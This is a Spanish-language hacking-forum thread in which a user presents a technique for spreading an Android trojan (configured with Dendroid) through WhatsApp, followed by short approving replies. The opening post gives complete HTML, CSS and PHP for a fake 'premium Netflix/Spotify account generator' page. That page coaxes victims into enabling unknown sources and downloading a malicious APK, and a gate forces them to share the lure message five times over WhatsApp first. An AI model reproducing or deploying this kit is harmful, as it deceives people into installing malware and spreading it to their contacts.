Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Propagación de Malware en Android a través de Whatsapp

  • 5 Respuestas
  • 7276 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 876
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« en: Febrero 01, 2018, 03:19:44 pm »
Muy buenas Underc0ders,

hoy quería mostrar una técnica que llevo viendo mucho tiempo, en la cual se difunde algo con ingeniería social y forzándote a enviar Whatsapp para poder utilizar alguna herramienta, y así poder mostrarte publicidad. En este caso en lugar de mostrar publicidad vamos a hacer que la víctima descargue una aplicación maliciosa, para estoy yo voy a configurar un troyano con dendroid.



Yo además de esto he creado una interfaz gráfica para poder engañar al usuario, simulando un generador de cuentas premium tanto en Netflix como en Spotify.



Una vez hecho esto vamos a crear una página donde indique como descargar y usar esta aplicación, al ser una infección en Android tendremos que decirle al usuario que active la opción de aceptar apk's externas a Google Play. Así ha quedado en mi caso.

estilo.css

Código: CSS
  1. body{
  2. background-color: black;
  3. }
  4.  
  5. h1{
  6. color: white;
  7. font-family: 'PT Sans';
  8. }
  9.  
  10. h2{
  11. color: red;
  12. font-family: 'PT Sans';
  13. }
  14.  
  15. h3{
  16. color: white;
  17. font-family: 'PT Sans';
  18. }
  19.  
  20. p{
  21. color: white;
  22. font-family: 'PT Sans';
  23. }
  24.  
  25.  
  26. .boton_1{
  27.     text-decoration: none;
  28.     padding: 3px;
  29.     padding-left: 10px;
  30.     padding-right: 10px;
  31.     font-family: helvetica;
  32.     font-weight: 300;
  33.     font-size: 25px;
  34.     font-style: italic;
  35.     color: #006505;
  36.     background-color: #82b085;
  37.     border-radius: 15px;
  38.     border: 3px double #006505;
  39. }
  40. .boton_1:hover{
  41.     opacity: 0.6;
  42.     text-decoration: none;
  43. }

instalacionAndroid.html

Código: HTML5
  1. <title>Instalar Generador de cuentas Spotify/Netflix para Android</title>
  2. <link REL="StyleSheet" href="estilo.css" type="text/css" MEDIA="screen">
  3. </head>
  4. <div align="center">
  5. <h1>GUIA DE USO GENERADOR DE CUENTAS PREMIUM</h1>
  6. <h2>Usar la aplicación generadora de cuentas Premium para Spotify y para Netflix es muy sencillo.</h2></br><p>
  7. - PASO 1: Elegir en qué plataforma quiere crear la cuenta.</br></br>
  8. - PASO 2: Añadir el usuario y contraseña que quiera usar.</br></br>
  9. - PASO 3: Pulsar el botón dado para crear la cuenta.</br></br>
  10. - PASO 4: Esperar varios minutos.</br></br>
  11. - PASO 5: Entrar con dicho usuario y contraseña en la plataforma elegida.</br></br></p>
  12.  
  13. <img src="ImagenRegistro.png">
  14. <h1>GUIA INSTALACION GENERADOR DE CUENTRAS PREMIUM</h1>
  15. <h2>Para instalarlo deberás aceptar aplicaciones no provenientes de Google Play en tu móvil.</h2></br>
  16. <p>
  17. - PASO 1: Dirigete a la configuración de tu móvil.</br></br>
  18. - PASO 2: Dirigete al submenú Seguridad / Aplicaciones.</br></br>
  19. - PASO 3: Activa la opción "Fuentes desconocidas".</br></br>
  20. <img src="http://img-17.ccm2.net/PoRKJZp-i7i9B_VAXJZ1C8gmofk=/2bd3dffc46954811a306b181e203cf9e/ccm-faq/itar-fuentes-desconocidas-android-s-.png"></br></br>
  21. - PASO 4: Descarga la aplicación de este <a href="programaMalicioso.apk">link</a> y empieza a utilizarla.
  22. </p>
  23. </div>
  24. </body>
  25. </html>





El siguiente paso sería hacer la página que nos obligará a compartir el enlace y una vez compartido nos dará permiso para ir a lo que hicimos anteriormente, y así podran descargar nuestro "generador de contraseñas premium". Les dejo el código y a continuación lo voy explicando por partes.

index.php

Código: PHP
  1. <html>
  2. <head>
  3. <title>COMPARTA LA APLICACION</title>
  4. <link REL="StyleSheet" href="estilo.css" type="text/css" MEDIA="screen">
  5. <script>
  6. <?php
  7.  
  8. include('Mobile-Detect/Mobile_Detect.php');
  9. $detect = new Mobile_Detect();
  10.  
  11. if ( $detect->isAndroidtablet() ) {
  12.         $an = 1;
  13. } elseif( $detect->isAndroid() ) {
  14.         $an = 1;
  15. } else{
  16.         $an = 0;
  17. }
  18.  
  19. echo '
  20. var an = '.$an.';
  21. '
  22. ?>
  23.  
  24. var compartido = 0;
  25. function compartir(){
  26.         compartido++;
  27.         document.getElementById("comp").innerHTML = compartido;
  28.         window.open("https://api.whatsapp.com/send?text=Aplicacion%20generadora%20de%20cuentas%20Premium%20totalmente%20gratuita.%20Funcional%20en%20NETFLIX%20y%20Sporify.%20Descarga%20ahora%20en:%20192.168.1.37/index.php");
  29. }
  30. function descargar(){
  31.         if (compartido >= 5){
  32.                 location.href = "instalacionAndroid.html";     
  33.         }
  34.         else{
  35.                 alert("No ha compartido la herramienta suficientes veces.");   
  36.         }
  37. }
  38. </script>
  39. <script>
  40. function comprobar(){
  41.         if(an != 1){
  42.                 document.getElementById("body").innerHTML = "";
  43.                 alert("La aplicación es solo para Android");
  44.         }
  45. }
  46. </script>
  47. </head>
  48. <body onload="comprobar()" id="body">
  49. <div align="center">
  50. <h1>Para poder descargar la aplicación debe compartirla 5 veces por Whatsapp</h1>
  51. <h2>Veces compartida</h2> <h2 id="comp">0</h2>
  52. <button class="boton_1" onclick="compartir()">Compartir Por Whatsapp</button></br></br>
  53. <button class="boton_1" onclick="descargar()">Descargar aplicación</button></br></br>
  54. <img src="ImagenRegistro.png">
  55. </div>
  56. </body>
  57. </html>

Bien, ahora vemos por partes. Lo primero que tenemos que entender es esto:

Código: PHP
  1. include('Mobile-Detect/Mobile_Detect.php');
  2. $detect = new Mobile_Detect();
  3.  
  4. if ( $detect->isAndroidtablet() ) {
  5.         $an = 1;
  6. } elseif( $detect->isAndroid() ) {
  7.         $an = 1;
  8. } else{
  9.         $an = 0;
  10. }
  11.  
  12.  

Lo que hace esto es comprobar si estamos utilizando Android u otro sistema operativo, y de ahí crea una variable que pasa a JavaScript, que luego utilizaremos para que la página se comporte de una forma u otra dependiendo de donde se esté corriendo.

Para ello he incluído una librería que podéis encontrar aquí.

Código: Javascript
  1. function comprobar(){
  2.         if(an != 1){
  3.                 document.getElementById("body").innerHTML = "";
  4.                 alert("La aplicación es solo para Android");
  5.         }
  6. }

Esta parte comprueba que la página se está visualizando desde un Android, en caso contrario manda una alerta y no muestra nada.



Código: Javascript
  1. var compartido = 0;
  2. function compartir(){
  3.         compartido++;
  4.         document.getElementById("comp").innerHTML = compartido;
  5.         window.open("https://api.whatsapp.com/send?text=Aplicacion%20generadora%20de%20cuentas%20Premium%20totalmente%20gratuita.%20Funcional%20en%20NETFLIX%20y%20Sporify.%20Descarga%20ahora%20en:%20192.168.1.37/index.php");
  6. }
  7. function descargar(){
  8.         if (compartido >= 5){
  9.                 location.href = "instalacionAndroid.html";     
  10.         }
  11.         else{
  12.                 alert("No ha compartido la herramienta suficientes veces.");   
  13.         }
  14. }

Esta parte crea dos funciones, la primera es la que te hace compartir el mensaje por whatsapp, además tiene un contador que se va actualizando cada vez que compartes.

La segunda sirve para descargar, comprueba si lo has compartido las suficientes veces y en caso positivo te redirecciona al lugar donde puedes descargar la aplicación.

Para compartir la aplicación por Whatsapp se usa el siguiente link, donde texto es el texto del mensaje que deberán enviar.

https://api.whatsapp.com/send?text=texto

Una vez hecho esto veamos como quedaría.



Vemos que al darle al compartir nos manda a Whatsapp para enviar el mensaje de la siguiente forma.







Al compartir y volver veremos que el contador ha aumentado, entonces al llegar a 5 podremos descargar nuestra aplicación, en caso de pulsar el otro botón antes de haber compartido 5 veces nos saldrá una alerta y no nos dejará.



Ya estaría todo hecho, sé que esto se podría hacer mucho mejor, pero así es la idea básica de como funcionaría, si alguien quiere aportar código bienvenido es.

También me pueden seguir en Twitter si les hace ilusión: @RoloMijan

Saludos.
« Última modificación: Abril 01, 2018, 10:19:11 am por rollth »

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1923
  • Actividad:
    3.33%
  • Reputación 15
    • Ver Perfil
« Respuesta #1 en: Febrero 01, 2018, 03:30:02 pm »
Muy bueno, además es bastante utilizado, así que es útil que la gente conozca la técnica.

Gracias @rollth

Un saludo.



Desconectado Stiuvert

  • *
  • Underc0der
  • Mensajes: 2676
  • Actividad:
    3.33%
  • Reputación 15
    • Ver Perfil
  • Skype: [email protected]
  • Twitter: @Stiuvert
« Respuesta #2 en: Febrero 01, 2018, 03:44:24 pm »
¡Genial aporte rollth!
Hace falta mucha ingeniería social pero la idea y el método usado es buenísimo.

Saludos

Desconectado roadd

  • *
  • Underc0der
  • Mensajes: 119
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Hacking Desde Cero By Roadd Dogg
  • Skype: [email protected]
  • Twitter: @RoaddHDC
« Respuesta #3 en: Febrero 01, 2018, 05:21:31 pm »
Excelente Rolo! Como siempre.

No solo es un lujo el poder leerte sino que tambien hasta nos deja el css xD aporte 100%
Web: www.hackingdesdecero.org
Igm: /secureart
Telegram: @roaddhdc
Correo: [email protected]
Face: /roaddhdc
Twitter: @roaddhdc
Youtube: www.youtube.com/channel/UCx8hRcHzHboIjpyfCWz_W_w

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 876
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #4 en: Febrero 01, 2018, 05:40:46 pm »
Muchas gracias a los 3 por vuestros comentarios, me alegra mucho que haya gustado :D

Saludos,

Desconectado Nobody

  • *
  • Underc0der
  • Mensajes: 197
  • Actividad:
    0%
  • Reputación 4
  • Security as art.
    • Ver Perfil
    • Nobody Test Laboratory
  • Twitter: @n0bodysec
« Respuesta #5 en: Febrero 02, 2018, 02:12:37 pm »
¡Sencillamente excelente!
Creo que es el primer análisis sobre este tipo de propagación que veo.

Gracias por el aporte, Rolo.

Saludos.

 

¿Te gustó el post? COMPARTILO!



WPA2 KRACK ATTACK - Prueba de concepto Android y Linux

Iniciado por DhaveSec

Respuestas: 1
Vistas: 3984
Último mensaje Octubre 16, 2017, 01:27:26 pm
por b4r7
Como tomar control de un dispositivo Android en menos de 1 minuto

Iniciado por ANTRAX

Respuestas: 24
Vistas: 26619
Último mensaje Junio 29, 2019, 10:40:59 pm
por Psico
Proyecto HackDroid – Aplicaciones de Pentesting para Android

Iniciado por CyberSec777

Respuestas: 1
Vistas: 2890
Último mensaje Abril 05, 2019, 12:31:58 pm
por baron.power
Herramientas de ciberseguridad para Android [Pengodroid 3]

Iniciado por Lautaro Villarreal Culic'

Respuestas: 2
Vistas: 2468
Último mensaje Mayo 15, 2019, 04:42:19 pm
por Lautaro Villarreal Culic'
Kwetza - Inyecta Payloads en Aplicaciones Android

Iniciado por ANTRAX

Respuestas: 0
Vistas: 3112
Último mensaje Julio 17, 2017, 12:08:55 pm
por ANTRAX